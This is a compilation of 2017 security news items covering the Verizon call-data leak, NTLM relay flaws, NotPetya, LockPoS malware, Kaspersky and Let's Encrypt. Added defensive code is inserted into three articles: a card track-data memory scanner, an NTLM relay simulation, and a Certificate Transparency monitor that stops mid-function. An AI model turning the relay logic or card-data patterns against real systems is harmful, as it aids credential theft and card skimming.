The exposed data also revealed that NICE Systems has a partnership with the Paris-based telecommunications company Orange; it seems that the third-party firm collects customer details across Europe and Africa.

“The data repository, an Amazon Web Services S3 bucket administered by a NICE Systems engineer based at their Ra’anana, Israel headquarters, appears to have been created to log customer call data for unknown purposes;” reads a blog post published by Vickery. “Verizon, the nation’s largest wireless carrier, uses NICE Systems technology in its back-office and call center operations. In addition, French-language text files stored in the server show internal data from Paris-based telecommunications corporation Orange S.A.—another NICE Systems partner that services customers across Europe and Africa.”

verizon data breach-leak
The exposed data include sensitive information on millions of customers, including names, phone numbers, and account PINs (personal identification numbers).

The huge trove of data relates to customers’ calls to Verizon’s customer service over the past six months.

“Beyond the risks of exposed names, addresses, and account information being made accessible via the S3 bucket’s URL, the exposure of Verizon account PIN codes used to verify customers, listed alongside their associated phone numbers, is particularly concerning.” continues the expert, “Possession of these account PIN codes could allow scammers to successfully pose as customers in calls to Verizon, enabling them to gain access to accounts—an especially threatening prospect, given the increasing reliance upon mobile communications for purposes of two-factor authentication.”

It is still unclear why Verizon allowed NICE to collect call details; experts speculate that the third-party vendor was tasked with monitoring the efficiency of Verizon’s call-center operators.
The incident demonstrates the risks of third-party vendors handling sensitive data. UpGuard pointed out the long interval between its initial notification to Verizon (June 13) and the closure of the breach (June 22).

“Finally, this exposure is a potent example of the risks of third-party vendors handling sensitive data,” reads the blog post from UpGuard.
“NICE Systems’ history of supplying technology for use in intrusive, state-sponsored surveillance is an unsettling indicator of the severity of this breach of privacy.”

Chris Vickery has discovered many other high-profile cases of databases left exposed on the Internet. In December 2015 he found 191 million records belonging to US voters online, and in April 2016 he discovered a 132 GB MongoDB database open online containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, containing details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a leak of 1.37 billion records, and in June 2017 Vickery revealed that the firm DRA had left 1.1 TB of data unsecured on Amazon S3, exposing 198 million US voter records.


MS Patch Tuesday fixes 19 critical issues, including two NTLM zero-day flaws
13.7.2017 securityaffairs Vulnerability

As part of the Microsoft Patch Tuesday, the tech giant fixed two critical flaws in the Windows NTLM security protocol. Users must apply the patch as soon as possible.
As part of the July Patch Tuesday, Microsoft has released security patches for a serious privilege escalation flaw affecting all Windows operating system versions for enterprises released since 2007.

Experts at security firm Preempt discovered two zero-day flaws that affect the Windows NTLM security protocols. The vulnerabilities could be exploited by attackers to create a new domain administrator account and take over the target domain.

NT LAN Manager (NTLM) is an old authentication protocol; although it was superseded by Kerberos in Windows 2000, it is still supported by Microsoft and used by many organizations.

NTLM flow

The first flaw is that the Lightweight Directory Access Protocol (LDAP) is not protected from NTLM relay; the second is related to the Remote Desktop Protocol (RDP) Restricted-Admin mode.

Although LDAP signing protects against both Man-in-the-Middle (MitM) attacks and credential forwarding, LDAP over TLS (LDAPS) protects only against MitM, so the protocol does not fully protect against NTLM relay attacks.

The vulnerability could be exploited by an attacker with SYSTEM privileges on a machine to use incoming NTLM sessions and perform LDAP operations on behalf of the NTLM user, including updating domain objects.

“This allows an attacker with SYSTEM privileges on a machine to use any incoming NTLM session and perform the LDAP operations on behalf of the NTLM user.” reads a blog post published by Preempt.

“To realize how severe this issue is, we need to realize all Windows protocols use the Windows Authentication API (SSPI) which allows downgrade of an authentication session to NTLM. As a result, every connection to an infected machine (SMB, WMI, SQL, HTTP) with a domain admin would result in the attacker creating a domain admin account and getting full control over the attacked network.”

The second NTLM vulnerability affects the RDP Restricted-Admin mode, which allows users to access a remote machine without providing their password to it.

According to Preempt researchers, the RDP Restricted-Admin allows authentication systems to downgrade to NTLM.

This means that it is possible to perform NTLM relay attacks and password cracking against the RDP Restricted-Admin.

“Preempt discovered that RDP Restricted-Admin, which is sometimes referred to (mistakenly) as Kerberosed RDP, allows downgrade to NT LAN Manager in the authentication negotiation. This means that every attack you can perform with NTLM such as credential relaying and password cracking could be carried out against RDP Restricted-Admin.” continues the analysis.

Chaining the two zero-days, an attacker could create a bogus domain admin account whenever an admin connects with RDP Restricted-Admin and get control of the entire domain.

The NTLM flaws were reported to Microsoft in April, but the company only acknowledged the NTLM LDAP vulnerability (tracked as CVE-2017-8563) a month later. Microsoft did not recognize the RDP bug as a vulnerability; the tech giant classified it as a “known issue” that can be addressed with a proper network configuration.

Microsoft recommends companies running vulnerable servers with NT LAN Manager enabled to patch them as soon as possible.

Other mitigation actions are:

turning NT LAN Manager off.
requiring that incoming LDAP and SMB packets are digitally signed in order to prevent credential relay attacks.

Microsoft has released patches for 55 security vulnerabilities, including 19 critical issues, in its products, including Edge, Internet Explorer, Windows, Office and Office Services and Web Apps, .NET Framework, and Exchange Server.


Following NotPetya NATO Increases Support for Ukraine’s Cyber Defenses
13.7.2017 securityaffairs BigBrothers

Following the massive NotPetya attack, NATO increases support for Ukrainian cyber defenses, and Ukraine considers joining NATO.
“Critical Infrastructure” is one of the most sensitive elements of any country’s economy. Recent attacks against Ukraine’s infrastructure have many other countries taking note and have encouraged NATO to pitch in and help bolster Ukrainian cyber defenses.

In December 2015, Ukrainian power grid operators watched helplessly as hackers remotely logged into three power distribution centers and turned off power to over 230,000 residents. The hackers had started their plans many months earlier by sending carefully crafted phishing emails to key IT staff working for the target companies. The malicious attachments to these emails allowed the bad guys to gain a foothold in the networks and over the subsequent months they carefully gathered information and improved their remote capabilities until it was time to strike. Attribution is difficult, but given the patience and approaches demonstrated by the bad guys it is obvious that they are sophisticated and many people are pointing their finger at Russian-linked hacking groups.

Ukraine notpetya Petwrap ransomware

More recently, in June 2017, a ransomware attack was launched in Ukraine impacting transportation, banking and power infrastructure. Believed to be the Petya ransomware variant, the attack spread beyond the original targets and became a worldwide problem that has directly cost millions of dollars in lost production for many companies as well as untold costs in remediation and recovery efforts. As investigators began to dig deeper into the Petya attack it appears that it was only masquerading as ransomware. The primary function of ransomware is to generate revenue for the bad guys. However, this attack had a clunky mechanism for gathering the ransom so it appears its primary function was something else. Most experts now agree that this was another attack intended to disrupt Ukrainian infrastructure and have dubbed it the NotPetya attack. Again attribution is uncertain, but Russian-linked groups are suspected.

All other countries are keeping a close watch on these developments. It is reported that critical infrastructure protections in Ukraine are better than many other countries’ so it is conceivable that these same attacks will eventually be turned against new targets. In a demonstration of solidarity — and likely a lot of self-interest — NATO has agreed to provide Ukraine with support and equipment to “help Ukraine investigate who is behind the different attacks,” according to NATO secretary-general Jens Stoltenberg. In December 2014 NATO established the Cyber Defence Trust Fund with a mandate “to provide Ukraine with the necessary support to develop its strictly defensive, CSIRT-type technical capabilities, including laboratories to investigate cyber security incidents.” Since June 2016, €965,000 has been contributed by eight countries and while this helped to bolster Ukrainian cyber defenses, it is obvious that it isn’t enough.

Speaking on the topic of Ukraine formally joining the NATO union at a joint press conference with NATO on Monday, Ukrainian President Petro Poroshenko said,

“Today we clearly stated that we would begin a discussion about a membership action plan and our proposals for such a discussion were accepted with pleasure.”

Given the recent cyber attacks’ rumored source in Russian-linked hacking groups, the ongoing tensions between Russia and Ukraine, as well as Russia’s public stance against any NATO expansion, this is unlikely to calm things down in the region. But with the sophistication of the cyber attacks and the apparent disregard for global impacts beyond Ukrainian borders, it is impractical for other countries to sit on the sidelines and let Ukraine attempt to protect itself.


LockPoS Point of Sale Malware Emerges

12.7.2017 securityweek Virus

A newly discovered Point of Sale (PoS) malware is being delivered via a dropper that is manually loaded and executed on the targeted systems, Arbor Networks Security researchers warn.

The new threat was associated with command and control (C&C) servers used by Flokibot in a campaign targeting Brazil. Dubbed LockPoS, the malware appears to have been compiled in late June and to use a dropper that injects it directly into the explorer.exe process.

After being manually loaded and executed, the dropper continues by extracting a resource file from itself. The resource contains multiple components that are injected into explorer.exe and which act as a second-stage loader. Next, it starts decrypting, decompressing, and loading the final LockPoS payload.

While analyzing the malware, Arbor Networks researchers discovered it uses a regular “registry run” method for persistence. The malware obfuscates important strings using XOR and a key of “A”. It also stores an initial configuration unencrypted as a binary structure.

The malware’s communication with the C&C server is performed via HTTP, using a very telling User-Agent. Information sent to the server includes username, computer name, and bot ID, Bot version (1.0.0.6), CPU, Physical memory, Display devices, Windows version and architecture, and MD5 hash of currently running sample.

“The malware’s PoS credit card stealing functionality works similarly to other PoS malware: it scans the memory of other running programs looking for data that matches what credit card track data looks like. Here’s a snippet of the matching function,” the security researchers explain.
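To show what “data that matches what credit card track data looks like” means in practice (for this write-up and for the securityaffairs one above), here is an added example that is not Arbor Networks’ code and not the matching function from the malware: a scanner of the kind used in forensic triage or DLP to flag card track data in a memory dump or log. It applies Track 1 and Track 2 layout patterns plus a Luhn check and reports masked PANs only; the sample buffer is constructed and uses a well-known test PAN.

```python
import re

# Track 1 (format B): %B<PAN>^<NAME>^<YYMM><service code>...?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})")
# Track 2: ;<PAN>=<YYMM><service code>...?
TRACK2 = re.compile(rb";?(\d{13,19})=(\d{4})")


def luhn_ok(pan: bytes) -> bool:
    """Luhn check-digit validation; filters digit runs that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(pan.decode("ascii"))):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: bytes) -> str:
    """Keep BIN and last four digits, as a report should never carry the full PAN."""
    s = pan.decode("ascii")
    return s[:6] + "*" * (len(s) - 10) + s[-4:]


def find_track_data(buf: bytes):
    """Return Luhn-valid track hits with masked PAN, expiry (YYMM) and byte offset."""
    hits = []
    for track, pattern in ((1, TRACK1), (2, TRACK2)):
        for m in pattern.finditer(buf):
            pan = m.group(1)
            if not luhn_ok(pan):
                continue  # looks like a PAN but is not one: skip, do not report
            expiry = m.group(3) if track == 1 else m.group(2)
            hits.append({
                "track": track,
                "pan": mask_pan(pan),
                "expiry": expiry.decode("ascii"),
                "offset": m.start(),
            })
    return sorted(hits, key=lambda h: h["offset"])


# Constructed stand-in for a process memory region: HTTP noise, one Track 1 record,
# one Track 2 record, and a digit run that fails Luhn (not a card number).
# 4111111111111111 is a well-known test PAN, not a real card.
SAMPLE_MEMORY = (
    b"\x00\x01GET /status HTTP/1.1\r\nHost: pos.example\r\n\r\n"
    b"%B4111111111111111^DOE/JOHN^25121010000000000?\x00\x00"
    b"\x00;4111111111111111=2512101?\x00"
    b"\x00;4111111111111110=2512101?\x00"
    b"log line: transaction 42 approved\n"
)


if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_MEMORY):
        print(hit)
```

The same patterns can be run over a captured network stream or a suspect process dump to confirm whether card data was present in scraped memory.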

Until now, the new malware has been distributed via a Flokibot botnet, and, with both threats sharing a common C&C server, the researchers believe that same threat actor controls both of them. Because the Flokibot campaign associated with the server was targeting Brazil, the researchers believe LockPoS will target the same country as well.

Although the same C&C at treasurehunter[.]at was used in another PoS malware campaign in what FireEye referred to last year as TREASUREHUNT, Arbor Networks says that LockPoS is a different malware family from TREASUREHUNT.

“It is currently unclear whether LockPoS is an exclusive malware associated with one threat actor or whether it will be sold on underground forums like Flokibot was. Based on the internals of the malware described in this post, LockPoS seems to be coded well and stable, but doesn’t particularly raise the bar when it comes to ‘highly advanced malware’,” the researchers note.


Microsoft Patches LDAP Relay Vulnerability in NTLM

12.7.2017 securityweek Vulnerability

Microsoft resolved over 50 bugs with its July 2017 set of security patches, one being a vulnerability where the Lightweight Directory Access Protocol (LDAP) wasn’t protected from Microsoft NT LAN Manager (NTLM) relay.

Discovered by the Preempt research team, the LDAP relay attack could be exploited by a hacker to create new domain administrator accounts even when best-practice controls are enabled. A similar attack can be performed by exploiting a RDP relay flaw in NTLM, the security researchers said.

NTLM consists of a series of security protocols aimed at offering authentication, integrity, and confidentiality, and NTLM relay is one of the main attack vectors for hackers and pen-testers, Preempt argues.

The basic manner in which NTLM works is that the user encrypts a server-issued challenge with their password hash to establish a connection. An attacker able to use the challenge in a parallel session with the server needs to forward “the same encrypted hash to create a successful NTLM authentication” and use this to open a session (such as SMB) and infect the target system with malware.

Countermeasures preventing NTLM credential relay include SMB signing – where a derived session key is used to digitally sign all incoming packets, thus preventing server exploitation even if the NTLM session was relayed; and Enhanced Protection for Authentication (EPA) – where the client signs an element of the TLS session with the derived session key, thus protecting the server from credential relaying.

“LDAP protocol is used in Active Directory to query and update all domain objects. There is a special configuration in the Group Policy Object (GPO) - Domain Controller: LDAP server signing requirements. When this GPO is set to Require Signing the domain controller rejects LDAP sessions that are not either digitally signed with a derived session key or the entire session is encrypted over TLS (LDAPS),” Preempt’s Yaron Zinar explains.

Tracked as CVE-2017-8563, the vulnerability resides in LDAPS protecting against Man-in-the-Middle (MitM) attacks, as LDAP signing does, but not against credential forwarding.

“This allows an attacker with SYSTEM privileges on a machine to use any incoming NTLM session and perform the LDAP operations on behalf of the NTLM user,” Zinar notes.

Because all Windows protocols use the Windows Authentication API (SSPI), which allows for authentication sessions to be downgraded to NTLM, “every connection to an infected machine (SMB, WMI, SQL, HTTP) with a domain admin would result in the attacker creating a domain admin account and getting full control over the attacked network,” the researcher notes.
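To make the challenge-response and signing argument above concrete (and the same point in the earlier securityaffairs write-up of these NTLM flaws), here is an added simulation that is not Preempt’s or Microsoft’s code. It models NTLMv2 challenge-response in-process with a relay in the middle and shows why a relayed authentication succeeds, yet any request the relay issues is rejected once the server requires packets signed with the derived session key. MD5 stands in for MD4 in the NT hash, and the account, domain and password are constructed values.

```python
import hashlib
import hmac
import os


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def nt_hash(password: str) -> bytes:
    # Real NTLM uses MD4 over the UTF-16LE password. MD5 stands in here (assumption)
    # because MD4 is absent from many OpenSSL 3 builds; the relay logic is unaffected.
    return hashlib.md5(password.encode("utf-16le")).digest()


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    # NTLMv2 key: HMAC-MD5 over upper-cased user name plus domain, keyed by the NT hash.
    return hmac_md5(nt_hash(password), (user.upper() + domain).encode("utf-16le"))


def ntlmv2_response(ntv2: bytes, server_challenge: bytes, client_challenge: bytes):
    """Return (nt_proof, session_key): the proof answers the challenge, the key signs traffic."""
    nt_proof = hmac_md5(ntv2, server_challenge + client_challenge)
    session_key = hmac_md5(ntv2, nt_proof)  # derived from the secret, never sent on the wire
    return nt_proof, session_key


class Client:
    """The victim: it only ever sees a challenge and answers it."""

    def __init__(self, user: str, domain: str, password: str):
        self.ntv2 = ntowf_v2(password, user, domain)
        self.session_key = None

    def answer(self, server_challenge: bytes):
        client_challenge = os.urandom(8)
        nt_proof, self.session_key = ntlmv2_response(self.ntv2, server_challenge, client_challenge)
        return client_challenge, nt_proof


class Server:
    """The target (think: a domain controller's LDAP service). It knows the account secret."""

    def __init__(self, user: str, domain: str, password: str, require_signing: bool):
        self.ntv2 = ntowf_v2(password, user, domain)
        self.require_signing = require_signing
        self.pending_challenge = None
        self.sessions = {}  # session id -> derived session key

    def issue_challenge(self) -> bytes:
        self.pending_challenge = os.urandom(8)
        return self.pending_challenge

    def authenticate(self, client_challenge: bytes, nt_proof: bytes):
        expected, session_key = ntlmv2_response(self.ntv2, self.pending_challenge, client_challenge)
        if not hmac.compare_digest(expected, nt_proof):
            return None
        session_id = os.urandom(4).hex()
        self.sessions[session_id] = session_key
        return session_id

    def handle_request(self, session_id: str, payload: bytes, signature) -> bool:
        """Accept or reject an authenticated request (e.g. an LDAP modify)."""
        key = self.sessions[session_id]
        if not self.require_signing:
            return True  # unsigned requests honoured: a relayed session can act freely
        if signature is None:
            return False
        return hmac.compare_digest(hmac_md5(key, payload), signature)


def relay_scenario(require_signing: bool) -> dict:
    """Victim -> relay -> target. Returns what the target accepted."""
    victim = Client("alice", "CORP", "constructed-password-1")  # constructed values
    target = Server("alice", "CORP", "constructed-password-1", require_signing)

    # 1. The victim connects to the relay; the relay opens its own session to the target
    #    and hands the target's challenge to the victim unchanged.
    server_challenge = target.issue_challenge()
    client_challenge, nt_proof = victim.answer(server_challenge)

    # 2. The relay forwards the victim's proof. It is a valid answer, so authentication succeeds.
    session_id = target.authenticate(client_challenge, nt_proof)
    authenticated = session_id is not None

    # 3. The relay now tries to act on the session. It never learned the NT hash, so it
    #    cannot derive the session key: it can only send unsigned or forged-signature requests.
    payload = b"LDAP modify: add account to Domain Admins"  # the kind of operation CVE-2017-8563 exposed
    relay_accepted = target.handle_request(session_id, payload, None)
    forged_accepted = target.handle_request(session_id, payload, b"\x00" * 16)

    # 4. Contrast: the party holding the derived key can sign and is accepted.
    genuine_accepted = target.handle_request(session_id, payload, hmac_md5(victim.session_key, payload))

    return {
        "authenticated": authenticated,
        "relay_request_accepted": relay_accepted or forged_accepted,
        "genuine_request_accepted": genuine_accepted,
    }


if __name__ == "__main__":
    for signing in (False, True):
        print("require_signing=%s -> %s" % (signing, relay_scenario(signing)))
```

Setting the LDAP signing GPO to Require Signing (or enforcing SMB signing) corresponds to `require_signing=True` here: authentication still relays, but the relayed session cannot issue a request the server will honour.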

The second vulnerability Preempt discovered resides in RDP Restricted-Admin, a mode that allows users to connect to remote machines without revealing their password to the machine. RDP Restricted-Admin, the researchers say, allows downgrade to NTLM in the authentication negotiation, meaning that attacks that can be performed with NTLM can be carried out against RDP Restricted-Admin.

“As RDP Restricted-Mode is often used by support technicians with elevated privileges to access remote machines, this puts their credentials at risk of being compromised. Furthermore, when combined with the first LDAP relay issue, this means that each time an admin connected with RDP Restricted-Admin an attacker was able to create a rogue domain admin,” Zinar says.

Although RDP Restricted-Mode was previously found to allow attackers to connect to remote machines using pass-the-hash, Microsoft told Preempt that the vulnerability was a known issue, and “recommended configuring network to be safe from any sort of NTLM relay.”


U.S. Bans Kaspersky Software Amid Concerns Over Russia Ties

12.7.2017 securityweek BigBrothers

Washington - The US government has moved to block federal agencies from buying software from Russia-based Kaspersky Lab, amid concerns about the company's links to intelligence services in Moscow.

The General Services Administration, which handles federal government purchasing contracts, said in a statement to AFP that Kaspersky Lab, a major global provider of cybersecurity software, has been removed from its list of approved vendors, making it more difficult to obtain Kaspersky products.

"GSA's priorities are to ensure the integrity and security of US government systems and networks and evaluate products and services available on our contracts using supply chain risk management processes," the agency said in a statement.

The action came weeks after top US intelligence agency and law enforcement officials publicly expressed concerns about use of Kaspersky software.

The officials, appearing at a congressional hearing in May, stopped short of offering specifics but appeared to suggest concerns over the computer security firm's alleged links to Russian defense and intelligence bodies.

The company said in a statement to AFP Wednesday, "Kaspersky Lab has no ties to any government, and the company has never helped, nor will help, any government in the world with its cyberespionage efforts."

It added that "the company is being unjustly accused without any hard evidence to back up these false allegations."

A Bloomberg News report this week meanwhile claimed internal company emails show that Kaspersky has maintained a closer working relationship with Russia's main intelligence agency, the FSB, than it has publicly admitted.

Kaspersky on Tuesday issued a statement disputing the Bloomberg accounting, saying "the communication was misinterpreted or manipulated," but did acknowledge that it "regularly cooperates with law enforcement agencies, industry peers and victims of cybercrime."

The company has repeatedly denied working with any government agency, and Russia-born founder Eugene Kaspersky has on several occasions sought to counter any such allegations.

In a June 30 blog post, Kaspersky wrote, "For some reason the assumption continues to resonate that since we're Russian, we must also be tied to the Russian government. But really, as a global company, does anyone seriously think we could survive this long if we were a pawn of ANY government?"


Apple Builds Data Center in China, Promises No Backdoors

12.7.2017 securityweek Apple

Apple opens data center in China - Image Credits: flickr.com/photos/nez

Apple on Wednesday announced the establishment of its first China-based data center in an effort to improve its services in the region and comply with recently implemented regulations, but the tech giant has promised not to build any backdoors into its systems.

The new data center is located in China’s Guizhou province, which Apple selected following a “careful study” – the company said it was impressed with the local government’s leadership and its focus on environmental sustainability. Officials from the Guizhou province visited Silicon Valley last year to promote big data opportunities as part of a pilot program.

“In partnership with a local internet services company, Guizhou on the Cloud Big Data, we’re proud of the fact the facility will be fully powered by 100 percent renewable energy like all of our other data centers around the world,” Apple said in a statement sent to SecurityWeek.

"Our Chinese customers love using iCloud to store their photos, videos, documents and apps securely, and to keep them updated across all of their devices. We're committed to continuously improving the user experience, and the addition of this data center will allow us to improve the speed and reliability of our products and services while also complying with newly passed regulations,” Apple added.

The cybersecurity regulations in question, adopted last year and implemented on June 1, impose new rules on online service providers. Trade groups opposed the initiative – whose initial version even required companies to submit source code for verification – arguing that it gave an unfair advantage to Chinese businesses.

The new law is largely focused on protecting China’s networks and private user information, and it requires cloud services to be operated by local companies. As a result, Apple has teamed up with government-owned Guizhou-Cloud Big Data to offer its iCloud service.

While some may be concerned about the location of the data center given the Chinese government’s track record, Apple has promised to maintain its strong data privacy and security protections and not create any backdoors into its systems.

Apple’s announcement comes just weeks after Chinese authorities reported uncovering a massive underground operation run by Apple employees who had abused the company’s internal systems to collect and sell customers’ personal details.


Edgewise Networks Emerges From Stealth to Bring Zero Trust Networking to the Data Center

12.7.2017 securityweek Security

Burlington, MA-based Edgewise Networks has emerged from stealth mode with a product designed to implement a zero-trust approach to network security.

Founded by Peter Smith and Harry Sverdlove in Spring 2016; backed by venture capital firms .406 Ventures, Accomplice, and Pillar; and supported by Patrick Morley (CEO of Carbon Black), Omar Hussain (CEO of Imprivata), Brian Ahern (CEO of Threat Stack), and Bob Brennan (CEO of Veracode), Edgewise seeks to augment perimeter firewalls and improve on microsegmentation.

Edgewise believes that there is a fundamental flaw in defense-by-firewall. While firewalls can detect and block known bad addresses, they cannot detect bad use of good addresses. This means that any compromise of a 'good' address can allow an attacker straight through the firewall, by policy, and into an attack position.

"There are two commonalities in almost all publicized attacks," comments co-founder Peter Smith. "Firstly, attackers rarely, if ever, enter a network directly on their ultimate target: they gain a foothold, surveil the attack surface and then move laterally to where they can conduct the final attack. Secondly, they invariably accomplish this by introducing malicious code at some stage -- for C&C, for the next stage of the attack, and so on."

Preventing the lateral movement is where firewalls fail. They can see where traffic is coming from, and they can see where it is going; but they cannot see who is in control of the software being used, or the server from which it comes. Consider NotPetya, he said. "The worm spread more or less unabated because the firewalls could not detect any maliciousness in the traffic."

Microsegmentation is an improvement on perimeter firewalls alone; but is still not adequate. "Essentially, it forces all traffic through the firewall. Beside the complexity of installation and management, the firewalls still cannot prevent the attacks because they can still only protect what they can see; and despite the fact that they can see all of the network traffic, they can only look at the traffic to identify malicious behavior -- they cannot look outside of the traffic, cannot look at the hosts to see what software is actually making those communications."

Edgewise sees its product as being more effective than complex microsegmentation, and even easier to use than relatively simple next-gen firewalls.

Firewalls, he continued, can only attribute traffic to the address that sent it and the address that receives it. "They cannot see the actual software that created the connection; or the user controlling the application; or the host on which it is running. There is consequently no guarantee that the application you trust is controlled by the user you think should be controlling it. Most new technology just looks more closely at network packets -- but however much you stare at the packet, it will not tell you the identity of the software producing the communication or the user controlling it on either side of the connection."

Two primary aspects of Edgewise illustrate how it operates. Firstly, it ensures that only trusted applications communicate by mutually validating the identity of the underlying software, users and hosts before allowing the connection. "This approach," says the company, "extends the zero-trust networking model that calls for validating application communications and not trusting addresses to secure internal networks."

Secondly, it uses machine-learning to model application communication patterns and generate optimal protection policies automatically. This serves several purposes. It can be used to generate maximum protection from minimum policies, and to produce a policy map that can be used as a 'what-if' model even by non-experts. New policies can be tested on the map to see exactly what effect they will have on the overall network attack surface.

The result, said Smith, "is that we get rid of all of the unnecessary network attack surface that firewalls cannot see. We stop anything that is not trusted and we build the policies for the customer automatically. We have a machine-learning system that analyzes the communication patterns of the software we protect, and then creates the policies to protect the systems. No user intervention is necessary to build the policies -- only to apply them." Which, he added, can be a single click.

"The user sees a map of how the software communicates," he continued. "He can select the software he particularly wishes to protect, and one click will protect it. Only trustworthy software will be allowed to communicate. We also measure the risk associated with the environment -- the attack surface. We measure how much it is, and how much it would shrink if the customer applies our protection."

Edgewise calls this 'Trusted Application Networking'. "It's what Forrester calls zero-trust networking, and what Gartner calls CARTA," said Smith. "Essentially they boil down to the same thing: assert the identity of communicating software and the entities communicating; do not just blindly trust addresses."


Organizations Only Slightly Improved Security Posture: Report

12.7.2017 securityweek Analysis

Organizations made some improvements to their security posture last year, but only marginally, as the average time-to-fix is still too high and remediation rates are too low, according to the 12th annual application security statistics report from WhiteHat Security.

WhiteHat Security’s report is based on dynamic and static testing data collected in 2016 from 15,000 web apps and over 65,000 mobile applications.

The figures show a 25 percent improvement in the average number of vulnerabilities found in web applications – the number dropped from four flaws in 2015 to three flaws in 2016. However, the security firm pointed out that a majority of applications have three or more security holes and nearly half of them are critical.

Looking at the vulnerability profile of each industry, we see that the services sector has the highest number of vulnerabilities, followed by transportation, retail and education.

Vulnerabilities by industry verticals

According to WhiteHat, nearly half of the applications it has tested are vulnerable every single day of the year. In industries such as utilities, retail, accommodations and education, roughly 60 percent of web applications are always vulnerable.

Dynamic security testing conducted by the company showed that the most prevalent vulnerabilities are information leakage, cross-site scripting (XSS), content spoofing, and insufficient transport layer protection. The types of vulnerabilities that are most often found to be critical are SQL injection, XSS, cross-site request forgery (CSRF) and insufficient authorization.

While, as expected, development teams focus on fixing critical and high severity flaws first, low-risk weaknesses are addressed before medium-risk ones.

“Development teams are prioritizing critical software problems first, but then move on to easier fixes,” WhiteHat said in its report. “This is human nature. After patching tricky vulnerabilities, why not knock out a few simple ones?”

The study found that while XSS vulnerabilities are critical 40 percent of the time, developers ignored nearly half of these security holes in 2016. Even SQL injection, which is considered critical in 94 percent of cases, only has a remediation rate of 60 percent.

There have been some improvements in the time it takes software developers to fix a vulnerability – the average number of days dropped from 146 days in 2015 to 129 days in 2016. However, it still took developers, on average, nearly 200 days to patch high severity problems, up from 171 in 2015.

Static testing conducted by WhiteHat showed that insufficient transport layer protection, SQL injection, and unpatched libraries are critical in many cases. However, fewer than half of critical bugs are fixed during the development process, meaning the rest make it into production.

In the case of vulnerabilities discovered via static testing, developers seem to focus on issues that are easy to fix and often neglect more severe problems.

The full Application Security Statistics Report, which also includes data on mobile application vulnerabilities, is available in PDF format.


Let's Encrypt Wildcard Certificates a 'Boon' for Cybercriminals, Expert Says

12.7.2017 securityweek Safety

To speed up the adoption of HTTPS, free and open Certificate Authority (CA) Let’s Encrypt will start issuing wildcard certificates as of January 2018.

Created by Mozilla, the University of Michigan, and the Electronic Frontier Foundation (EFF), with Cisco and Akamai as founding sponsors, Let’s Encrypt is pushing for a fully encrypted World Wide Web. The move should help better protect user data from eavesdroppers, but some concerns have been raised about the new offering.

Let’s Encrypt came out of private beta in December 2015 and issued its millionth certificate in March 2016. Last week, the organization announced it had already issued over 100 million security certificates, thus becoming one of the largest CAs by number of issued certificates.

Now, the organization is moving to accelerate HTTPS deployment by starting to issue wildcard certificates, “a commonly requested feature.”

“A wildcard certificate can secure any number of subdomains of a base domain (e.g. *.example.com). This allows administrators to use a single certificate and key pair for a domain and all of its subdomains, which can make HTTPS deployment significantly easier,” Josh Aas, ISRG Executive Director, notes.

Let’s Encrypt’s more than 100 million digital certificates secure around 47 million domains, which also benefit from the CA’s fully automated DV certificate issuance and management API. According to Aas, Let’s Encrypt’s service has already helped raise the percentage of encrypted page loads from 40% to 58%.

The organization will be offering wildcard certificates free of charge via an upcoming ACME v2 API endpoint. Only base domain validation via DNS will be supported in the beginning, but the CA may explore additional validation options over time.

“We decided to announce this exciting development during our summer fundraising campaign because we are a nonprofit that exists thanks to the generous support of the community that uses our services. If you’d like to support a more secure and privacy-respecting Web, donate today,” Aas concludes.

Let’s Encrypt’s goal might be improved security and privacy for all users, but that doesn’t mean its certificates can’t be misused. In March 2017, encryption expert Vincent Lynch revealed that, over a 12-month period, Let’s Encrypt had issued around 15,000 certificates containing the term PayPal for phishing sites.

According to Kevin Bocek, chief security strategist for Venafi, Let’s Encrypt’s introduction of free wildcard certificates is great for privacy, but a boon for cybercriminals.

“Cybercriminals can create thousands of fake websites using Let’s Encrypt’s wildcard certificates, all with a seemingly trustworthy glowing green padlock in the web browser address field,” Bocek told SecurityWeek. “We have seen bad actors abuse Let’s Encrypt certificates before: more than 14,000 certificates were issued for PayPal phishing websites by Let’s Encrypt, a powerful example of how bad guys exploit Certificate Authority business processes.”

“There’s no putting the Let’s Encrypt genie back in the bottle, but this means every organization could be victimized by malicious websites designed to spoof their customers and partners,” Bocek added. “This means every organization must monitor the internet for malicious certificates. Google’s Certificate Transparency initiative and other similar technologies allow organizations to spot fake or malicious certificates regardless of the CA.”
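The monitoring Bocek describes is usually done by screening Certificate Transparency log entries for names that carry your brand outside the domains you actually own. The script below is an added example written for this page, not code from Venafi, Let’s Encrypt or Google: the log entries, the brand keyword `acmepay` and the allowlisted domain `acmepay.example` are all constructed, and `registrable()` is a deliberately crude eTLD+1 stand-in. It also shows the wildcard point made above: a wildcard certificate appears in the log only as `*.base`, so brand-bearing hostnames issued under it never reach the log and have to be judged from the base name alone.

```python
"""Screening CT-log-style certificate entries for brand impersonation.

Constructed example: the entries below mimic the fields a Certificate
Transparency monitor returns (log index, issuer, logged names); no real
certificates or domains are involved.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class CertEntry:
    log_index: int
    issuer: str
    names: List[str]  # subject CN plus subjectAltNames, exactly as logged


@dataclass
class Finding:
    log_index: int
    name: str
    reason: str


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels). Production code should use the
    public suffix list so that names like foo.co.uk are handled correctly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def screen(entries: List[CertEntry], brands: List[str],
           allowlist: List[str]) -> List[Finding]:
    """Flag names that carry a brand keyword outside the brand's own domains.

    Wildcard names get special treatment: CT shows only '*.base', so any
    brand-bearing hostname issued under it never appears in the log.
    """
    brands = [b.lower() for b in brands]
    allowed = {a.lower() for a in allowlist}
    findings: List[Finding] = []
    for entry in entries:
        for raw in entry.names:
            name = raw.lower()
            wildcard = name.startswith("*.")
            host = name[2:] if wildcard else name
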